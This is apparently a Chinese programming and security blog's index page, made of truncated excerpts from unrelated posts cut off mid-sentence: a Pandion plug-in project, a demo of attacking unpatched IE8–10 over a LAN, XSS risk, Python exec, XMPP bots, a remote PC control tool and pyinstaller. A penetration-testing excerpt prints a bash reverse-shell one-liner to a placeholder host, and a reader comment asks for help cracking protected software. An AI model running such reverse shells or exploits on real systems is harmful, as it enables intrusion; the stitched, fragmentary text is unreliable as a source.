kissthink™
just for fun
纯javascript和网页开发, 源代码在 src
Pandion http://www.pandion.be/download/
Pandion 插件开发 http://ymt.googlecode.com/files/pandion_plug-in_specification_1.3.pdf
设定
通过settings/brand.xml 可设定以下信息
softwarename
softwarenamesafe 用于文件和目
这个漏洞可以导致IE浏览器崩溃,涉及的版本有 ie8,9,10,微软在14年6月10日发布了更新补丁,所以现在只能攻击没有更新至今年6月10号的IE浏览器了。详情看这里:
http://www.exploit-db.com/exploits/33860/
如上面介绍,利用这个漏洞,我们需要一段html代码。下面我在本机演示下局域网攻击吧,靶机是安装在虚拟机中的win7_sp1-ie9:
首先修改本机 /var/www 目录下的 index.html 为以下内容:
&
0×00 前言
众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型分为两种持久型和非持久型:
1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。
2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客可以用XSS内容经正常功能进入数据库持久保存。
一般持久型XSS漏洞比非持久型XSS漏洞风险等级高,从漏洞的本质上来说这是没错的,但漏洞的利用
exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句。下面是一个简单的例子。
>>> exec 'print "Hello World"'
Hello World
注意例子中exec语句的用法和eval_r(), execfile()是不一样的. exec是一个语句(就象print或while), 而eval_r()和execf
0×00 前言
在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结.
0×01 反弹shell
1) Bash
部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口
bash -i >& /dev/tcp/x.x.x.x/2333 0>&a
ython语言: python gtalk机器人
# coding: utf-8
#
# 这是根据xmpp封装的Jabber聊天机器人类, 可以通过继承,重载部分函数来自定义功能.
# Jabber ID(JID): 比如gamcat@gmail.com
import xmpp
class Bot:
""" Jabber Bot Base Cl
文章开头,先打一下广告咯,今年误打误撞,侥幸进入2013CSDN博客之星候选,目前排名已经有点不堪入目,所以,谨希望广大基友们动动手指,轻轻的点击两下,给我投出宝贵的一票,求宣传,求扩散,非常感谢,感激涕零,总之是语无伦次的感谢!!!
投票地址请移驾:http://vote.blog.csdn.net/blogstaritem/blogstar2013/weidi1989
源码地址:http://download.csdn.net/deta
简单的远程电脑监控。
已经实现如下功能:
消息类型
1获取计算机名
11获取进程列表
12结束进程
21弹出对话框
31锁定计算机
41列出目录
51执行程序
61退出程序
几个月前看到某网游公司的服务端监控程序有一个功能,从服务器反PING各客户端,进而了解各客户端到服务端的PING高低,以及客户端大致的区域分布情况,于是有想法自己用PYTHON也写一个。今天网上查到一个PYTHON实现PING的源码,看了一下,很不错。
重点是发现别人写的代码格式很优美,我的相比简直太差了。哎,努力学习。
先转贴别人的源码,这几天有空后再根据这个改进,逐步达到我的设计目标。
代码我在python 2.6 elicp
使用pyinstaller打包python为exe文件
最近用python的tkinter写了个windows界面的工具,用来对软件版本发布的自动化,之前发布版本是由PHP的同事完成,又是手动上传文件到ftp,又是修改数据库,php代码等这么多繁琐的步骤。所以决定用python写了个windows的应用,因为版本发布可能会交给运营的同事完成,所以用tkinter写了个界面,顺便转换成exe的文件,之前是用py2exe,觉得不好用,搜索到了pyinstaller,还不错,使用简单,且打包成ex
最新评论
很好啊 学习了
这是什么的
你可以帮我看看我做的C-minus吗?有很大问题,希望你指导!谢谢!
httpwatch还是得用破解版的
这个留言太奇葩了,发了好多次了。不过您的文章很好
我们使用的是Xproer.WordPaster这个控件。网上有整合的示例:http://www.cnblogs.com/xproer/archive/2011/04/08/2009500.html
请问可以说下思路吗
那如果某时不想全屏了怎么办呢,就是运行过程中又不要全屏了,如何通知Java呢?【Android】
hi! how to get roster for xmpphp?Thanks.
不知道注册机有没有写出来?我也有个项目需要这个,程序都不发布,只能买了20个点想破解,518的版本,vmp的壳不好搞啊,能不能赐教下